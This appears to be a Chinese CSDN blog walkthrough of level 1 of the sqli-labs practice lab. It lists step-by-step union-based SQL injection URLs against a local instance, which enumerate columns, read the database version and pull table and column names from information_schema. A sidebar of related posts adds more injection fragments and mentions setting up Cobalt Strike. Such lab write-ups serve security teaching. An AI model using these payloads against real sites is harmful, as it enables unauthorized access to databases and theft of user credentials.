SQL注入:sqli第一关

最新推荐文章于 2024-11-09 15:14:31 发布
最新推荐文章于 2024-11-09 15:14:31 发布
阅读量490 收藏 5
点赞数 5
文章标签: 负载均衡 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69863399/article/details/135944310
版权

一、实验设备:

需要下载并安装phpstudy_pro,下载sqli-labs-php7-master解压到/phpstudy_pro/www中。

二、实验步骤:

1、在id=1后加入一个闭合符号“ ‘ ”,但是当你输入?id=1',是会报错的,

http://127.0.0.1/sincer/Less-1/?id=1%27

然后在后面加上--qwe将后面注释掉,如果没有报错,则证明为字符型。

http://127.0.0.1/sincer/Less-1/?id=1%27%20--%20qwe

 

 2、猜字段,使用order by查询字段个数,逐渐增加order by后面的数字,从1开始一直到报错为止,当order by到第四个字段时就报错了,所以说明有三个字段。

http://127.0.0.1/sincer/Less-1/?id=1%27%20order%20by%204%20--%20qwe

3、 用select查询三个字段,目的是为了知道那几个字段在前端显示,这样我们可以将想要查询的数据将前端显示的字段替换掉,在这里查询数据库版本。但是要注意前面的id就不能是1,而是要改为id=-1,这样做的目的是为了让前面的查询语句不执行,这样后面查询的version()才能显示出来。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,2,3%20--%20qwe

 先用MySQL查看版本号

然后将1,2,3中的2或者3换成 version()即可

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,version(),3%20--%20qwe

 

4、 使用show databases;查询数据库,其中的information_schema库中有我们所需要的表名与库名。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--%20qwe

5、现在我们知道了security数据库中的所有表名,我们需要查询password和username,常理下这些数据库都会存储到users中,所以嘞我们现在需要查询users这个表中的所有字段是啥子。

http://127.0.0.1/sincer/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--%20qwe

 

空白者@
关注
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1468
SQLI第四关
sqli-labs第七关sql注入流程
qq_33598708的博客
04-09 3662
正常访问 http://127.0.0.1/sqli-labs-master/Less-7/?id=1 正常访问以后提示Use outfile..... 什么是outfile:参考地址 MySQL中你可以使用SELECT...INTO OUTFILE语句来简单的导出数据到文本文件上。 判断注入类型 http://127.0.0.1/sqli-labs-master/Less-7/?id=1' and '1'='1 通过注入字符没有报错可以判断是字符类型的,这关数据库报错不会提示
网络安全04-sql注入靶场第一关
m0_68976043的博客
01-28 2186
sql注入环境,这个环境网上很多教程,其大部分基本都是小皮面板加漏洞环境放在WWW目录下,搜一下很容易就搭建出来了,这里就不详细讲述了,最后搭建下来的图片如图所示。
SQL注入sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 9607
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sql注入第一关
qq_62740725的博客
02-18 422
Sql是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,目前是黑客对数据库进行攻击的最常用手段之一。
SQLI-LABS靶场进行sql注入第一关字符型注入 过关过程
weixin_74091677的博客
03-06 496
在我们把id值改为 1' 则它的源码sql语句便成为 select *from 表名 where id='1' ' 此时sql闭合而后面则多出来一个' 我们可以使用。之后我们给到一个and 1=2(%20是空格的意思)明显是一个错误逻辑但是依旧正常显示 可以判断这是一个字符型注入点(因为它把 1之后的数据给过滤了)可以看到此时 在给一个and 1=2时(%20是空格 %27是单引号') 没有回显了 逻辑通顺 我可以大致推断它的源码sql语句为。这里就可以看到数据库的username和对应的密码了。
centos云服务器安装cs(cobaltstrike4
2401_84253380的博客
04-26 396
wget https://repo.huaweicloud.com/java/jdk/8u201-b09/jdk-8u201-linux-x64.tar.gz #下载jdk压缩包tar -zxvf jdk-8u201-linux-x64.tar.gz #解压解压完之后生成一个jdk1.8.0_201文件mv jdk1.8.0_201 /usr/local/jdk1.8/ #把jdk1.8.0_201文件移动到usr/local/jdk1.8/目录下配置环境变量。
SQL注入学习之路:sqli-labs靶场实战解析
14至24关:这些关卡继续深化SQL注入的各种技术和策略,包括更复杂的联合查询、信息获取、权限提升等。学习者会接触到`UNION SELECT`、`INFORMATION_SCHEMA`表的使用,以及如何利用注入进行数据库的深度探索。 sqli-...
深入SQL注入靶场演练:sqlilabs与常用工具解析
6. **二次注入脚本**: 二次注入是指当一个Web应用在第一次安全处理数据后,由于不当的数据处理,使得这些数据在第二次使用时产生注入漏洞。二次注入脚本可能是一种自动化工具,用于识别和利用这种类型的漏洞。在本节...
sql注入-sqli-labs第17关
weixin_46784800的博客
11-10 1720
sqli-labs第17关 updatexml使用 第17关的关键函数为updatexml函数: UpdateXML(xml_target, xpath_expr, new_xml) 其中,xml_target作用为目标xml,xpath_expr作用为xpath语法,new_xml为要替换掉的xml内容,所以该函数能够用于注入的原因为,当xpath语法不合规时,会报错,实现报错注入。 updatexml(0,concat(0x7e, (select col2 from tableA limit 0,1),
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1598
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
完成我的第一个SQL注入的大致流程以及注意细节
shay_bx的博客
09-06 130
迅速判断测试点是否存在sql注入的方法 在无waf的情况,可用sqlmap等注入工具; 手工测试:单引号;1 and 1=1, 1 and 1=2;1‘and ‘1’=1,1‘and ‘1’=2; bp的sqlmap插件也可用;
系统学习SQL语句之第一部
老肖的博客
03-17 365
msyql基础
SQL注入实战系列sqli靶场第一关
VVzv的博客
08-27 2186
Sqli-less1: 打开sqli环境第一关(Less-1): 在链接Less-1/后面添加?id=1,然后回车即可; 添加?id=1后发现有了新的内容,在id=1后面加个单引号(')查看返回的内容; 发现返回了SQL语句的报错信息,从这个界面报错中可以得知这里是存在注入(现实中基本不会返回信息,这个我们将在后面接触),此处的id参数满足注入攻击的两个条件,id的参数用户可以控制,并且这个...
我的第一个SQL存储过程
静心编程-java-php-jsp-数据库-网站-我们一起成长
06-21 607
<!--google_ad_client = "pub-1654710028568330";/* 728x90, 创建于 08-5-19 */google_ad_slot = "5790075209";google_ad_width = 728;google_ad_height = 90;//--><script type="text/javascript"sr
我的第一个SqlHelper.cs
datai9697的博客
03-19 85
这个也借鉴了几个版本的一些代码。我没有写对存储过程的操作,因为我写不好存储过程。。。。。这个写完之后,我连测试都没测过。就当做给大家的反面教材吧! using System;using System.Collections.Generic;using System.Text;using System.Collections;using System.Data;using Syste...
2020-10-16 第一次使用sqli-labs(sqli-labs环境搭建)
qq_45766062的博客
10-16 1064
其实我作为一名网络空间安全专业的学生,也学习CTF有一段时间了。但是,一直也没有什么大的进展。前一段时间,我们学长给我们分享了一些CTF的学习思路,我感觉对我的帮助很大。今天,我也想分享给大家,希望能对大家有帮助。 sqli-labs环境搭建__ sqli-labs不像一些线上的靶场,它需要你自己搭建环境。 首先,sqli-labs下载网址:(也可以直接百度搜索:sqli-labs) https://github.com/Audi-1/sqli-labs 然后直接点击code下载即可。如图: 下载之后,先
解密 sqli靶场第一关:一步一步学习 SQL 注入技术
Filotimo_的博客
11-26 1188
本文说明了sqli靶场第一关通关过程思路
负载均衡式在线oj项目开发文档2(个人项目)
最新发布
D223546的博客
11-09 527
下面就是思考这个表中具有哪些属性列了,首先题目的编号肯定是要具有的(number,类型int,long都是可以的),下一个属性列就是题目的标题(tittle,字符串)了,标题之后就是这个题目的难度了,下一个题目的难度(star字符串),下一个就是题目的描述,题目的描述一般都是长文本(text类型),然后就是预设给用户的代码,自然使用的也是长文本(text),然后是测试用例,依旧是长文本(text),之后就是题目的时间限制(int)和题目的空间限制了(int)已上面的属性列来进行表的创建。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值